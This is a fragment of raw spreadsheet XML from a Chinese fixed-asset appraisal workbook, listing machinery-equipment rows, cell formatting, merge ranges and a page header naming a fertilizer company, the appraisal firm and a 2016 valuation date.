      <c r="H1534" s="107"/>
      <c r="I1534" s="135"/>
      <c r="J1534" s="135"/>
      <c r="K1534" s="116"/>
    </row>
    <row r="1535" customHeight="1" spans="2:11">
      <c r="B1535" s="93"/>
      <c r="C1535" s="93"/>
      <c r="D1535" s="135"/>
      <c r="E1535" s="135"/>
      <c r="F1535" s="135"/>
      <c r="G1535" s="93"/>
      <c r="H1535" s="107"/>
      <c r="I1535" s="135"/>
      <c r="J1535" s="135"/>
      <c r="K1535" s="116"/>
    </row>
    <row r="1536" customHeight="1" spans="2:11">
      <c r="B1536" s="93"/>
      <c r="C1536" s="93"/>
      <c r="D1536" s="135"/>
      <c r="E1536" s="135"/>
      <c r="F1536" s="135"/>
      <c r="G1536" s="93"/>
      <c r="H1536" s="107"/>
      <c r="I1536" s="135"/>
      <c r="J1536" s="135"/>
      <c r="K1536" s="116"/>
    </row>
    <row r="1537" customHeight="1" spans="2:11">
      <c r="B1537" s="93"/>
      <c r="C1537" s="93"/>
      <c r="D1537" s="135"/>
      <c r="E1537" s="135"/>
      <c r="F1537" s="135"/>
      <c r="G1537" s="93"/>
      <c r="H1537" s="107"/>
      <c r="I1537" s="135"/>
      <c r="J1537" s="135"/>
      <c r="K1537" s="116"/>
    </row>
    <row r="1538" customHeight="1" spans="2:11">
      <c r="B1538" s="93"/>
      <c r="C1538" s="93"/>
      <c r="D1538" s="135"/>
      <c r="E1538" s="135"/>
      <c r="F1538" s="135"/>
      <c r="G1538" s="93"/>
      <c r="H1538" s="107"/>
      <c r="I1538" s="135"/>
      <c r="J1538" s="135"/>
      <c r="K1538" s="116"/>
    </row>
    <row r="1539" customHeight="1" spans="2:11">
      <c r="B1539" s="93"/>
      <c r="C1539" s="93"/>
      <c r="D1539" s="135"/>
      <c r="E1539" s="135"/>
      <c r="F1539" s="135"/>
      <c r="G1539" s="93"/>
      <c r="H1539" s="107"/>
      <c r="I1539" s="135"/>
      <c r="J1539" s="135"/>
      <c r="K1539" s="116"/>
    </row>
    <row r="1540" customHeight="1" spans="2:11">
      <c r="B1540" s="93"/>
      <c r="C1540" s="93"/>
      <c r="D1540" s="135"/>
      <c r="E1540" s="135"/>
      <c r="F1540" s="135"/>
      <c r="G1540" s="93"/>
      <c r="H1540" s="107"/>
      <c r="I1540" s="135"/>
      <c r="J1540" s="135"/>
      <c r="K1540" s="116"/>
    </row>
    <row r="1541" customHeight="1" spans="2:11">
      <c r="B1541" s="93"/>
      <c r="C1541" s="93"/>
      <c r="D1541" s="135"/>
      <c r="E1541" s="135"/>
      <c r="F1541" s="135"/>
      <c r="G1541" s="93"/>
      <c r="H1541" s="107"/>
      <c r="I1541" s="135"/>
      <c r="J1541" s="135"/>
      <c r="K1541" s="116"/>
    </row>
    <row r="1542" customHeight="1" spans="2:11">
      <c r="B1542" s="93"/>
      <c r="C1542" s="93"/>
      <c r="D1542" s="135"/>
      <c r="E1542" s="135"/>
      <c r="F1542" s="135"/>
      <c r="G1542" s="93"/>
      <c r="H1542" s="107"/>
      <c r="I1542" s="135"/>
      <c r="J1542" s="135"/>
      <c r="K1542" s="116"/>
    </row>
    <row r="1543" customHeight="1" spans="2:11">
      <c r="B1543" s="93"/>
      <c r="C1543" s="93"/>
      <c r="D1543" s="135"/>
      <c r="E1543" s="135"/>
      <c r="F1543" s="135"/>
      <c r="G1543" s="93"/>
      <c r="H1543" s="107"/>
      <c r="I1543" s="135"/>
      <c r="J1543" s="135"/>
      <c r="K1543" s="116"/>
    </row>
    <row r="1544" customHeight="1" spans="2:11">
      <c r="B1544" s="93"/>
      <c r="C1544" s="93"/>
      <c r="D1544" s="135"/>
      <c r="E1544" s="135"/>
      <c r="F1544" s="135"/>
      <c r="G1544" s="93"/>
      <c r="H1544" s="107"/>
      <c r="I1544" s="135"/>
      <c r="J1544" s="135"/>
      <c r="K1544" s="116"/>
    </row>
    <row r="1545" customHeight="1" spans="2:11">
      <c r="B1545" s="93"/>
      <c r="C1545" s="93"/>
      <c r="D1545" s="135"/>
      <c r="E1545" s="135"/>
      <c r="F1545" s="135"/>
      <c r="G1545" s="93"/>
      <c r="H1545" s="107"/>
      <c r="I1545" s="135"/>
      <c r="J1545" s="135"/>
      <c r="K1545" s="116"/>
    </row>
    <row r="1546" customHeight="1" spans="2:11">
      <c r="B1546" s="93"/>
      <c r="C1546" s="93"/>
      <c r="D1546" s="135"/>
      <c r="E1546" s="135"/>
      <c r="F1546" s="135"/>
      <c r="G1546" s="93"/>
      <c r="H1546" s="107"/>
      <c r="I1546" s="135"/>
      <c r="J1546" s="135"/>
      <c r="K1546" s="116"/>
    </row>
    <row r="1547" customHeight="1" spans="2:11">
      <c r="B1547" s="93"/>
      <c r="C1547" s="93"/>
      <c r="D1547" s="135"/>
      <c r="E1547" s="135"/>
      <c r="F1547" s="135"/>
      <c r="G1547" s="93"/>
      <c r="H1547" s="107"/>
      <c r="I1547" s="135"/>
      <c r="J1547" s="135"/>
      <c r="K1547" s="116"/>
    </row>
    <row r="1548" customHeight="1" spans="2:11">
      <c r="B1548" s="93"/>
      <c r="C1548" s="93"/>
      <c r="D1548" s="135"/>
      <c r="E1548" s="135"/>
      <c r="F1548" s="135"/>
      <c r="G1548" s="93"/>
      <c r="H1548" s="107"/>
      <c r="I1548" s="135"/>
      <c r="J1548" s="135"/>
      <c r="K1548" s="116"/>
    </row>
    <row r="1549" customHeight="1" spans="2:11">
      <c r="B1549" s="93"/>
      <c r="C1549" s="93"/>
      <c r="D1549" s="135"/>
      <c r="E1549" s="135"/>
      <c r="F1549" s="135"/>
      <c r="G1549" s="93"/>
      <c r="H1549" s="107"/>
      <c r="I1549" s="135"/>
      <c r="J1549" s="135"/>
      <c r="K1549" s="116"/>
    </row>
    <row r="1550" customHeight="1" spans="2:11">
      <c r="B1550" s="93"/>
      <c r="C1550" s="93"/>
      <c r="D1550" s="135"/>
      <c r="E1550" s="135"/>
      <c r="F1550" s="135"/>
      <c r="G1550" s="93"/>
      <c r="H1550" s="107"/>
      <c r="I1550" s="135"/>
      <c r="J1550" s="135"/>
      <c r="K1550" s="116"/>
    </row>
    <row r="1551" customHeight="1" spans="2:11">
      <c r="B1551" s="93"/>
      <c r="C1551" s="93"/>
      <c r="D1551" s="135"/>
      <c r="E1551" s="135"/>
      <c r="F1551" s="135"/>
      <c r="G1551" s="93"/>
      <c r="H1551" s="107"/>
      <c r="I1551" s="135"/>
      <c r="J1551" s="135"/>
      <c r="K1551" s="116"/>
    </row>
    <row r="1552" customHeight="1" spans="2:11">
      <c r="B1552" s="93"/>
      <c r="C1552" s="93"/>
      <c r="D1552" s="135"/>
      <c r="E1552" s="135"/>
      <c r="F1552" s="135"/>
      <c r="G1552" s="93"/>
      <c r="H1552" s="107"/>
      <c r="I1552" s="135"/>
      <c r="J1552" s="135"/>
      <c r="K1552" s="116"/>
    </row>
    <row r="1553" customHeight="1" spans="2:11">
      <c r="B1553" s="93"/>
      <c r="C1553" s="93"/>
      <c r="D1553" s="135"/>
      <c r="E1553" s="135"/>
      <c r="F1553" s="135"/>
      <c r="G1553" s="93"/>
      <c r="H1553" s="107"/>
      <c r="I1553" s="135"/>
      <c r="J1553" s="135"/>
      <c r="K1553" s="116"/>
    </row>
    <row r="1554" customHeight="1" spans="2:11">
      <c r="B1554" s="93"/>
      <c r="C1554" s="93"/>
      <c r="D1554" s="135"/>
      <c r="E1554" s="135"/>
      <c r="F1554" s="135"/>
      <c r="G1554" s="93"/>
      <c r="H1554" s="107"/>
      <c r="I1554" s="135"/>
      <c r="J1554" s="135"/>
      <c r="K1554" s="116"/>
    </row>
    <row r="1555" customHeight="1" spans="2:11">
      <c r="B1555" s="93"/>
      <c r="C1555" s="93"/>
      <c r="D1555" s="135"/>
      <c r="E1555" s="135"/>
      <c r="F1555" s="135"/>
      <c r="G1555" s="93"/>
      <c r="H1555" s="107"/>
      <c r="I1555" s="135"/>
      <c r="J1555" s="135"/>
      <c r="K1555" s="116"/>
    </row>
    <row r="1556" customHeight="1" spans="2:11">
      <c r="B1556" s="93"/>
      <c r="C1556" s="93"/>
      <c r="D1556" s="135"/>
      <c r="E1556" s="135"/>
      <c r="F1556" s="135"/>
      <c r="G1556" s="93"/>
      <c r="H1556" s="107"/>
      <c r="I1556" s="135"/>
      <c r="J1556" s="135"/>
      <c r="K1556" s="116"/>
    </row>
    <row r="1557" customHeight="1" spans="2:11">
      <c r="B1557" s="93"/>
      <c r="C1557" s="93"/>
      <c r="D1557" s="135"/>
      <c r="E1557" s="135"/>
      <c r="F1557" s="135"/>
      <c r="G1557" s="93"/>
      <c r="H1557" s="107"/>
      <c r="I1557" s="135"/>
      <c r="J1557" s="135"/>
      <c r="K1557" s="116"/>
    </row>
    <row r="1558" customHeight="1" spans="2:11">
      <c r="B1558" s="93"/>
      <c r="C1558" s="93"/>
      <c r="D1558" s="135"/>
      <c r="E1558" s="135"/>
      <c r="F1558" s="135"/>
      <c r="G1558" s="93"/>
      <c r="H1558" s="107"/>
      <c r="I1558" s="135"/>
      <c r="J1558" s="135"/>
      <c r="K1558" s="116"/>
    </row>
    <row r="1559" customHeight="1" spans="2:11">
      <c r="B1559" s="93"/>
      <c r="C1559" s="93"/>
      <c r="D1559" s="135"/>
      <c r="E1559" s="135"/>
      <c r="F1559" s="135"/>
      <c r="G1559" s="93"/>
      <c r="H1559" s="107"/>
      <c r="I1559" s="135"/>
      <c r="J1559" s="135"/>
      <c r="K1559" s="116"/>
    </row>
    <row r="1560" customHeight="1" spans="2:11">
      <c r="B1560" s="93"/>
      <c r="C1560" s="93"/>
      <c r="D1560" s="135"/>
      <c r="E1560" s="135"/>
      <c r="F1560" s="135"/>
      <c r="G1560" s="93"/>
      <c r="H1560" s="107"/>
      <c r="I1560" s="135"/>
      <c r="J1560" s="135"/>
      <c r="K1560" s="116"/>
    </row>
    <row r="1561" customHeight="1" spans="2:11">
      <c r="B1561" s="93"/>
      <c r="C1561" s="93"/>
      <c r="D1561" s="135"/>
      <c r="E1561" s="135"/>
      <c r="F1561" s="135"/>
      <c r="G1561" s="93"/>
      <c r="H1561" s="107"/>
      <c r="I1561" s="135"/>
      <c r="J1561" s="135"/>
      <c r="K1561" s="116"/>
    </row>
    <row r="1562" customHeight="1" spans="2:11">
      <c r="B1562" s="93"/>
      <c r="C1562" s="93"/>
      <c r="D1562" s="135"/>
      <c r="E1562" s="135"/>
      <c r="F1562" s="135"/>
      <c r="G1562" s="93"/>
      <c r="H1562" s="107"/>
      <c r="I1562" s="135"/>
      <c r="J1562" s="135"/>
      <c r="K1562" s="116"/>
    </row>
    <row r="1563" customHeight="1" spans="2:11">
      <c r="B1563" s="93"/>
      <c r="C1563" s="93"/>
      <c r="D1563" s="135"/>
      <c r="E1563" s="135"/>
      <c r="F1563" s="135"/>
      <c r="G1563" s="93"/>
      <c r="H1563" s="107"/>
      <c r="I1563" s="135"/>
      <c r="J1563" s="135"/>
      <c r="K1563" s="116"/>
    </row>
    <row r="1564" customHeight="1" spans="2:11">
      <c r="B1564" s="93"/>
      <c r="C1564" s="93"/>
      <c r="D1564" s="135"/>
      <c r="E1564" s="135"/>
      <c r="F1564" s="135"/>
      <c r="G1564" s="93"/>
      <c r="H1564" s="107"/>
      <c r="I1564" s="135"/>
      <c r="J1564" s="135"/>
      <c r="K1564" s="116"/>
    </row>
    <row r="1565" customHeight="1" spans="2:11">
      <c r="B1565" s="93"/>
      <c r="C1565" s="93"/>
      <c r="D1565" s="135"/>
      <c r="E1565" s="135"/>
      <c r="F1565" s="135"/>
      <c r="G1565" s="93"/>
      <c r="H1565" s="107"/>
      <c r="I1565" s="135"/>
      <c r="J1565" s="135"/>
      <c r="K1565" s="116"/>
    </row>
    <row r="1566" customHeight="1" spans="2:11">
      <c r="B1566" s="93"/>
      <c r="C1566" s="93"/>
      <c r="D1566" s="135"/>
      <c r="E1566" s="135"/>
      <c r="F1566" s="135"/>
      <c r="G1566" s="93"/>
      <c r="H1566" s="107"/>
      <c r="I1566" s="135"/>
      <c r="J1566" s="135"/>
      <c r="K1566" s="116"/>
    </row>
    <row r="1567" customHeight="1" spans="2:11">
      <c r="B1567" s="93"/>
      <c r="C1567" s="93"/>
      <c r="D1567" s="135"/>
      <c r="E1567" s="135"/>
      <c r="F1567" s="135"/>
      <c r="G1567" s="93"/>
      <c r="H1567" s="107"/>
      <c r="I1567" s="135"/>
      <c r="J1567" s="135"/>
      <c r="K1567" s="116"/>
    </row>
    <row r="1568" customHeight="1" spans="2:11">
      <c r="B1568" s="93"/>
      <c r="C1568" s="93"/>
      <c r="D1568" s="135"/>
      <c r="E1568" s="135"/>
      <c r="F1568" s="135"/>
      <c r="G1568" s="93"/>
      <c r="H1568" s="107"/>
      <c r="I1568" s="135"/>
      <c r="J1568" s="135"/>
      <c r="K1568" s="116"/>
    </row>
    <row r="1569" customHeight="1" spans="2:11">
      <c r="B1569" s="93"/>
      <c r="C1569" s="93"/>
      <c r="D1569" s="135"/>
      <c r="E1569" s="135"/>
      <c r="F1569" s="135"/>
      <c r="G1569" s="93"/>
      <c r="H1569" s="107"/>
      <c r="I1569" s="135"/>
      <c r="J1569" s="135"/>
      <c r="K1569" s="116"/>
    </row>
    <row r="1570" customHeight="1" spans="2:11">
      <c r="B1570" s="93"/>
      <c r="C1570" s="93"/>
      <c r="D1570" s="135"/>
      <c r="E1570" s="135"/>
      <c r="F1570" s="135"/>
      <c r="G1570" s="93"/>
      <c r="H1570" s="107"/>
      <c r="I1570" s="135"/>
      <c r="J1570" s="135"/>
      <c r="K1570" s="116"/>
    </row>
    <row r="1571" customHeight="1" spans="2:11">
      <c r="B1571" s="93"/>
      <c r="C1571" s="93"/>
      <c r="D1571" s="135"/>
      <c r="E1571" s="135"/>
      <c r="F1571" s="135"/>
      <c r="G1571" s="93"/>
      <c r="H1571" s="107"/>
      <c r="I1571" s="135"/>
      <c r="J1571" s="135"/>
      <c r="K1571" s="116"/>
    </row>
    <row r="1572" customHeight="1" spans="2:11">
      <c r="B1572" s="93"/>
      <c r="C1572" s="93"/>
      <c r="D1572" s="135"/>
      <c r="E1572" s="135"/>
      <c r="F1572" s="135"/>
      <c r="G1572" s="93"/>
      <c r="H1572" s="107"/>
      <c r="I1572" s="135"/>
      <c r="J1572" s="135"/>
      <c r="K1572" s="116"/>
    </row>
    <row r="1573" customHeight="1" spans="2:11">
      <c r="B1573" s="93"/>
      <c r="C1573" s="93"/>
      <c r="D1573" s="135"/>
      <c r="E1573" s="135"/>
      <c r="F1573" s="135"/>
      <c r="G1573" s="93"/>
      <c r="H1573" s="107"/>
      <c r="I1573" s="135"/>
      <c r="J1573" s="135"/>
      <c r="K1573" s="116"/>
    </row>
  </sheetData>
  <mergeCells count="33">
    <mergeCell ref="B1:K1"/>
    <mergeCell ref="B3:C3"/>
    <mergeCell ref="D3:L3"/>
    <mergeCell ref="B359:D359"/>
    <mergeCell ref="B367:D367"/>
    <mergeCell ref="B370:D370"/>
    <mergeCell ref="B378:D378"/>
    <mergeCell ref="B380:D380"/>
    <mergeCell ref="B389:D389"/>
    <mergeCell ref="B396:D396"/>
    <mergeCell ref="B405:D405"/>
    <mergeCell ref="B421:D421"/>
    <mergeCell ref="B434:D434"/>
    <mergeCell ref="B439:D439"/>
    <mergeCell ref="B442:D442"/>
    <mergeCell ref="B445:D445"/>
    <mergeCell ref="B453:D453"/>
    <mergeCell ref="B460:D460"/>
    <mergeCell ref="B487:D487"/>
    <mergeCell ref="B494:D494"/>
    <mergeCell ref="B503:D503"/>
    <mergeCell ref="B544:D544"/>
    <mergeCell ref="B5:B6"/>
    <mergeCell ref="C5:C6"/>
    <mergeCell ref="D5:D6"/>
    <mergeCell ref="E5:E6"/>
    <mergeCell ref="F5:F6"/>
    <mergeCell ref="G5:G6"/>
    <mergeCell ref="H5:H6"/>
    <mergeCell ref="I5:I6"/>
    <mergeCell ref="J5:J6"/>
    <mergeCell ref="K5:K6"/>
    <mergeCell ref="L5:L6"/>
  </mergeCells>
  <pageMargins left="0.719444444444444" right="0.579861111111111" top="1.82986111111111" bottom="0.879861111111111" header="0.929861111111111" footer="0.65"/>
  <pageSetup paperSize="9" scale="75" orientation="landscape" horizontalDpi="600"/>
  <headerFooter alignWithMargins="0" scaleWithDoc="0">
    <oddHeader>&amp;L&amp;10
被评估单位（或者产权持有单位）：晋煤冀州银海化肥有限责任公司&amp;C&amp;"黑体,常规"&amp;18固定资产—机器设备评估明细表&amp;"宋体,常规"&amp;12
&amp;10评估基准日：2016年10月31日&amp;R&amp;10
表4-6-4
金额单位：人民币元</oddHeader>
    <oddFooter>&amp;L&amp;10评估单位:衡水正财资产评估有限公司&amp;C&amp;10评估人员：于红兵 郑国建 吴洁 贾佳 王文祥 程艳菊</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F1140"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="K111" sqref="K7:K111"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="14.5" defaultRowHeight="23.25" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="14.5" style="16"/>
    <col min="2" max="2" width="5.625" style="16" customWidth="1"/>
    <col min="3" max="3" width="8" style="16" customWidth="1"/>
    <col min="4" max="4" width="23.625" style="89" customWidth="1"/>
    <col min="5" max="5" width="18.25" style="89" customWidth="1"/>
    <col min="6" max="6" width="9.375" style="89" customWidth="1"/>
    <col min="7" max="7" width="5.625" style="16" customWidth="1"/>
    <col min="8" max="8" width="5.125" style="90" customWidth="1"/>
    <col min="9" max="9" width="11.875" style="16" customWidth="1"/>
    <col min="10" max="10" width="14" style="16" customWidth="1"/>
    <col min="11" max="11" width="13.625" style="91" customWidth="1"/>
    <col min="12" max="12" width="22.25" style="92" customWidth="1"/>
    <col min="13" max="16384" width="14.5" style="16"/>
  </cols>
  <sheetData>
    <row r="1" customHeight="1" spans="1:12">
      <c r="A1" s="93"/>
      <c r="B1" s="3" t="s">
        <v>206</v>
      </c>
      <c r="C1" s="3"/>
      <c r="D1" s="3"/>
      <c r="E1" s="3"/>
      <c r="F1" s="3"/>
      <c r="G1" s="3"/>
      <c r="H1" s="3"/>
      <c r="I1" s="3"/>
      <c r="J1" s="3"/>
      <c r="K1" s="3"/>
      <c r="L1" s="1"/>
    </row>
    <row r="2" customHeight="1" spans="1:12">
      <c r="A2" s="93"/>
      <c r="B2" s="1"/>
      <c r="C2" s="2"/>
      <c r="D2" s="2"/>
      <c r="E2" s="2"/>
      <c r="F2" s="2"/>
      <c r="G2" s="1"/>
      <c r="H2" s="1"/>
      <c r="I2" s="1"/>
      <c r="J2" s="1"/>
      <c r="K2" s="1"/>
      <c r="L2" s="1"/>
    </row>
    <row r="3" customHeight="1" spans="1:12">
      <c r="A3" s="93"/>
      <c r="B3" s="4" t="s">
        <v>207</v>
      </c>
      <c r="C3" s="4"/>
      <c r="D3" s="5" t="s">
        <v>1361</v>
      </c>
      <c r="E3" s="5"/>
      <c r="F3" s="5"/>
      <c r="G3" s="5"/>
      <c r="H3" s="5"/>
      <c r="I3" s="5"/>
      <c r="J3" s="5"/>
      <c r="K3" s="5"/>
      <c r="L3" s="5"/>
    </row>
    <row r="4" customHeight="1" spans="1:12">
      <c r="A4" s="93"/>
      <c r="B4" s="93"/>
      <c r="C4" s="93"/>
      <c r="D4" s="93"/>
      <c r="E4" s="93"/>
      <c r="F4" s="93"/>
      <c r="G4" s="93"/>
      <c r="H4" s="93"/>
      <c r="I4" s="93"/>
      <c r="J4" s="93"/>
      <c r="K4" s="93"/>
      <c r="L4" s="93"/>
    </row>
    <row r="5" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A5" s="93"/>
      <c r="B5" s="31" t="s">
        <v>209</v>
      </c>
      <c r="C5" s="46" t="s">
        <v>2722</v>
      </c>
      <c r="D5" s="32" t="s">
        <v>211</v>
      </c>
      <c r="E5" s="32" t="s">
        <v>212</v>
      </c>
      <c r="F5" s="32" t="s">
        <v>213</v>
      </c>
      <c r="G5" s="31" t="s">
        <v>214</v>
      </c>
      <c r="H5" s="33" t="s">
        <v>215</v>
      </c>
      <c r="I5" s="31" t="s">
        <v>216</v>
      </c>
      <c r="J5" s="46" t="s">
        <v>217</v>
      </c>
      <c r="K5" s="46" t="s">
        <v>218</v>
      </c>
      <c r="L5" s="31" t="s">
        <v>219</v>
      </c>
      <c r="M5" s="97"/>
      <c r="N5" s="97"/>
      <c r="O5" s="97"/>
      <c r="P5" s="97"/>
      <c r="Q5" s="97"/>
      <c r="R5" s="97"/>
      <c r="S5" s="97"/>
      <c r="T5" s="97"/>
      <c r="U5" s="97"/>
      <c r="V5" s="97"/>
      <c r="W5" s="97"/>
      <c r="X5" s="97"/>
      <c r="Y5" s="97"/>
      <c r="Z5" s="97"/>
      <c r="AA5" s="97"/>
      <c r="AB5" s="97"/>
      <c r="AC5" s="97"/>
      <c r="AD5" s="97"/>
      <c r="AE5" s="97"/>
      <c r="AF5" s="97"/>
    </row>
    <row r="6" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A6" s="93"/>
      <c r="B6" s="31"/>
      <c r="C6" s="48"/>
      <c r="D6" s="32"/>
      <c r="E6" s="32"/>
      <c r="F6" s="32"/>
      <c r="G6" s="31"/>
      <c r="H6" s="33"/>
      <c r="I6" s="31"/>
      <c r="J6" s="48"/>
      <c r="K6" s="48"/>
      <c r="L6" s="31"/>
      <c r="M6" s="97"/>
      <c r="N6" s="97"/>
      <c r="O6" s="97"/>
      <c r="P6" s="97"/>
      <c r="Q6" s="97"/>
      <c r="R6" s="97"/>
      <c r="S6" s="97"/>
      <c r="T6" s="97"/>
      <c r="U6" s="97"/>
      <c r="V6" s="97"/>
      <c r="W6" s="97"/>
      <c r="X6" s="97"/>
      <c r="Y6" s="97"/>
      <c r="Z6" s="97"/>
      <c r="AA6" s="97"/>
      <c r="AB6" s="97"/>
      <c r="AC6" s="97"/>
      <c r="AD6" s="97"/>
      <c r="AE6" s="97"/>
      <c r="AF6" s="97"/>
    </row>
    <row r="7" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A7" s="93"/>
      <c r="B7" s="88">
        <v>1</v>
      </c>
      <c r="C7" s="243" t="s">
        <v>3912</v>
      </c>
      <c r="D7" s="256" t="s">
        <v>3913</v>
      </c>
      <c r="E7" s="243" t="s">
        <v>294</v>
      </c>
      <c r="F7" s="89"/>
      <c r="G7" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H7" s="94">
        <v>1</v>
      </c>
      <c r="I7" s="243" t="s">
        <v>229</v>
      </c>
      <c r="J7" s="98">
        <v>8650</v>
      </c>
      <c r="K7" s="99">
        <v>5536</v>
      </c>
      <c r="L7" s="256" t="s">
        <v>3914</v>
      </c>
      <c r="M7" s="97"/>
      <c r="N7" s="97"/>
      <c r="O7" s="97"/>
      <c r="P7" s="97"/>
      <c r="Q7" s="97"/>
      <c r="R7" s="97"/>
      <c r="S7" s="97"/>
      <c r="T7" s="97"/>
      <c r="U7" s="97"/>
      <c r="V7" s="97"/>
      <c r="W7" s="97"/>
      <c r="X7" s="97"/>
      <c r="Y7" s="97"/>
      <c r="Z7" s="97"/>
      <c r="AA7" s="97"/>
      <c r="AB7" s="97"/>
      <c r="AC7" s="97"/>
      <c r="AD7" s="97"/>
      <c r="AE7" s="97"/>
      <c r="AF7" s="97"/>
    </row>
    <row r="8" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A8" s="93"/>
      <c r="B8" s="88">
        <v>2</v>
      </c>
      <c r="C8" s="243" t="s">
        <v>3915</v>
      </c>
      <c r="D8" s="256" t="s">
        <v>3916</v>
      </c>
      <c r="E8" s="243" t="s">
        <v>3917</v>
      </c>
      <c r="F8" s="89"/>
      <c r="G8" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H8" s="94">
        <v>1</v>
      </c>
      <c r="I8" s="243" t="s">
        <v>229</v>
      </c>
      <c r="J8" s="98">
        <v>1500</v>
      </c>
      <c r="K8" s="99">
        <v>60</v>
      </c>
      <c r="L8" s="256" t="s">
        <v>3918</v>
      </c>
      <c r="M8" s="97"/>
      <c r="N8" s="97"/>
      <c r="O8" s="97"/>
      <c r="P8" s="97"/>
      <c r="Q8" s="97"/>
      <c r="R8" s="97"/>
      <c r="S8" s="97"/>
      <c r="T8" s="97"/>
      <c r="U8" s="97"/>
      <c r="V8" s="97"/>
      <c r="W8" s="97"/>
      <c r="X8" s="97"/>
      <c r="Y8" s="97"/>
      <c r="Z8" s="97"/>
      <c r="AA8" s="97"/>
      <c r="AB8" s="97"/>
      <c r="AC8" s="97"/>
      <c r="AD8" s="97"/>
      <c r="AE8" s="97"/>
      <c r="AF8" s="97"/>
    </row>
    <row r="9" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A9" s="93"/>
      <c r="B9" s="88">
        <v>3</v>
      </c>
      <c r="C9" s="243" t="s">
        <v>3919</v>
      </c>
      <c r="D9" s="256" t="s">
        <v>3920</v>
      </c>
      <c r="E9" s="243" t="s">
        <v>3921</v>
      </c>
      <c r="F9" s="89"/>
      <c r="G9" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H9" s="94">
        <v>1</v>
      </c>
      <c r="I9" s="243" t="s">
        <v>229</v>
      </c>
      <c r="J9" s="98">
        <v>2500</v>
      </c>
      <c r="K9" s="99">
        <v>160</v>
      </c>
      <c r="L9" s="256" t="s">
        <v>3922</v>
      </c>
      <c r="M9" s="97"/>
      <c r="N9" s="97"/>
      <c r="O9" s="97"/>
      <c r="P9" s="97"/>
      <c r="Q9" s="97"/>
      <c r="R9" s="97"/>
      <c r="S9" s="97"/>
      <c r="T9" s="97"/>
      <c r="U9" s="97"/>
      <c r="V9" s="97"/>
      <c r="W9" s="97"/>
      <c r="X9" s="97"/>
      <c r="Y9" s="97"/>
      <c r="Z9" s="97"/>
      <c r="AA9" s="97"/>
      <c r="AB9" s="97"/>
      <c r="AC9" s="97"/>
      <c r="AD9" s="97"/>
      <c r="AE9" s="97"/>
      <c r="AF9" s="97"/>
    </row>
    <row r="10" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A10" s="93"/>
      <c r="B10" s="88">
        <v>4</v>
      </c>
      <c r="C10" s="243" t="s">
        <v>3923</v>
      </c>
      <c r="D10" s="256" t="s">
        <v>515</v>
      </c>
      <c r="E10" s="243" t="s">
        <v>3924</v>
      </c>
      <c r="F10" s="89"/>
      <c r="G10" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H10" s="94">
        <v>1</v>
      </c>
      <c r="I10" s="243" t="s">
        <v>229</v>
      </c>
      <c r="J10" s="98">
        <v>35000</v>
      </c>
      <c r="K10" s="99">
        <v>1400</v>
      </c>
      <c r="L10" s="256" t="s">
        <v>3918</v>
      </c>
      <c r="M10" s="97"/>
      <c r="N10" s="97"/>
      <c r="O10" s="97"/>
      <c r="P10" s="97"/>
      <c r="Q10" s="97"/>
      <c r="R10" s="97"/>
      <c r="S10" s="97"/>
      <c r="T10" s="97"/>
      <c r="U10" s="97"/>
      <c r="V10" s="97"/>
      <c r="W10" s="97"/>
      <c r="X10" s="97"/>
      <c r="Y10" s="97"/>
      <c r="Z10" s="97"/>
      <c r="AA10" s="97"/>
      <c r="AB10" s="97"/>
      <c r="AC10" s="97"/>
      <c r="AD10" s="97"/>
      <c r="AE10" s="97"/>
      <c r="AF10" s="97"/>
    </row>
    <row r="11" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A11" s="93"/>
      <c r="B11" s="88">
        <v>5</v>
      </c>
      <c r="C11" s="243" t="s">
        <v>3925</v>
      </c>
      <c r="D11" s="256" t="s">
        <v>3926</v>
      </c>
      <c r="E11" s="243" t="s">
        <v>3924</v>
      </c>
      <c r="F11" s="89"/>
      <c r="G11" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H11" s="94">
        <v>1</v>
      </c>
      <c r="I11" s="243" t="s">
        <v>229</v>
      </c>
      <c r="J11" s="98">
        <v>35000</v>
      </c>
      <c r="K11" s="99">
        <v>1400</v>
      </c>
      <c r="L11" s="256" t="s">
        <v>3918</v>
      </c>
      <c r="M11" s="97"/>
      <c r="N11" s="97"/>
      <c r="O11" s="97"/>
      <c r="P11" s="97"/>
      <c r="Q11" s="97"/>
      <c r="R11" s="97"/>
      <c r="S11" s="97"/>
      <c r="T11" s="97"/>
      <c r="U11" s="97"/>
      <c r="V11" s="97"/>
      <c r="W11" s="97"/>
      <c r="X11" s="97"/>
      <c r="Y11" s="97"/>
      <c r="Z11" s="97"/>
      <c r="AA11" s="97"/>
      <c r="AB11" s="97"/>
      <c r="AC11" s="97"/>
      <c r="AD11" s="97"/>
      <c r="AE11" s="97"/>
      <c r="AF11" s="97"/>
    </row>
    <row r="12" s="88" customFormat="1" customHeight="1" spans="1:32">
      <c r="A12" s="93"/>
      <c r="B12" s="88">
        <v>6</v>
      </c>
      <c r="C12" s="243" t="s">
        <v>3927</v>
      </c>
      <c r="D12" s="256" t="s">
        <v>964</v>
      </c>
      <c r="E12" s="243" t="s">
        <v>3928</v>
      </c>
      <c r="F12" s="89"/>
      <c r="G12" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H12" s="94">
        <v>1</v>
      </c>
      <c r="I12" s="243" t="s">
        <v>229</v>
      </c>
      <c r="J12" s="98">
        <v>5000</v>
      </c>
      <c r="K12" s="99">
        <v>200</v>
      </c>
      <c r="L12" s="256" t="s">
        <v>3918</v>
      </c>
      <c r="M12" s="97"/>
      <c r="N12" s="97"/>
      <c r="O12" s="97"/>
      <c r="P12" s="97"/>
      <c r="Q12" s="97"/>
      <c r="R12" s="97"/>
      <c r="S12" s="97"/>
      <c r="T12" s="97"/>
      <c r="U12" s="97"/>
      <c r="V12" s="97"/>
      <c r="W12" s="97"/>
      <c r="X12" s="97"/>
